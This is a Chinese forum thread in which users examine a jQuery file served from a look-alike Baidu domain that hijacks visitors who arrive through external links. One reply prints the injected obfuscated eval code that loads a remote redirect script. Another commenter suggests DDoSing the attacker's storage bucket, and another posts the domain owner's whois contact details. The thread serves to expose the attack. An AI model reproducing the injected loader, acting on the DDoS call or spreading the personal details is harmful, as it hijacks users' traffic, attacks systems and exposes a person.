
做法很高明呀,只有在外站链入到站点的时候才会发生跳转,搜索引擎的所有链入链接也都被劫持走了。直接访问网站却看不出丝毫问题。 这相似的链接.... 排查了 10 分钟才找出来! 
1 ues Oct 5, 2018 via Android 安全浏览器应该提示风险 |
2 zjsxwc Oct 5, 2018 公用的 js 也投毒, 233333333333 不过域名是百度的,没准它就是不想别人免费用它的 js 也说不定 |
3 azh7138m Oct 5, 2018 |
4 dot2017 Oct 5, 2018 baidu555556666.oss-cn-hongkong/aliyuncs/com 哪位大佬 DD 一下让他的 OSS 账单撑爆掉 |
5 23f0baf3 Oct 5, 2018 @zjsxwc 那个域名是 libs-baidu.com ,个人注册的,估计是个做黑厂的。whois 信息: Name:zhengxianbang Organization:zhengxianbang Street:yongjiaxian,yongjiaxian,kunyangxiang,zhengshancun City:beijing State:zhejiangsheng Postal Code:325100 Country:CN Phone:+86.57788888888 Fax:+86.57788888888 Email:[email protected] |
6 emCupid Oct 5, 2018 唉,提速降费是惠民了,位是运营商劫持也更变本加厉了 |
7 flowfire Oct 5, 2018 via iPhone https 怎么劫持? |
8 lotmany Oct 5, 2018 via iPhone 只看到域名不一样 并没发现什么劫持,跳转等其他不妥 |
9 changwei Oct 6, 2018 同上,就一截,除了域名不同以外,看出代有什。然我知道他做肯定有。 |
10 TrustOcean OP @flowfire @sunsulei @changwei 通过 tool.lu/js 的解码: 前者 JQ 脚本多出了一段加密后的 JS eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) d[e(c)] = k[c] || e(c); k = [function(e) { return d[e] }]; e = function() { return '\\w+' }; c = 1; }; while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); return p; }('4.5("<0 6=\\\'1/2\\\' 3=\\\'7://b.c.d/8?9=a\\\'></0>");', 14, 14, 'script|text|Javascript|src|document|writeln|type|https|safe|lx|lhc|www|05fu|com'.split('|'), 0, {})) 这一段引用了一个外站的跳转代码。 PS:只有当附带 refer 的情况下才会 GET 到真实跳转代码,否则报 404. |
13 lotmany Oct 6, 2018 via iPhone @TrustOcean 看不懂。。。不过也没必要看懂,冲着这个域名基本上就不是正常玩法 |
15 franklinyu Oct 7, 2018 完全另一域名 libs-baidu.com ,不用不就完了 |
16 huasec Mar 20, 2019 我的代码那么简单,都看不出来,真笨! |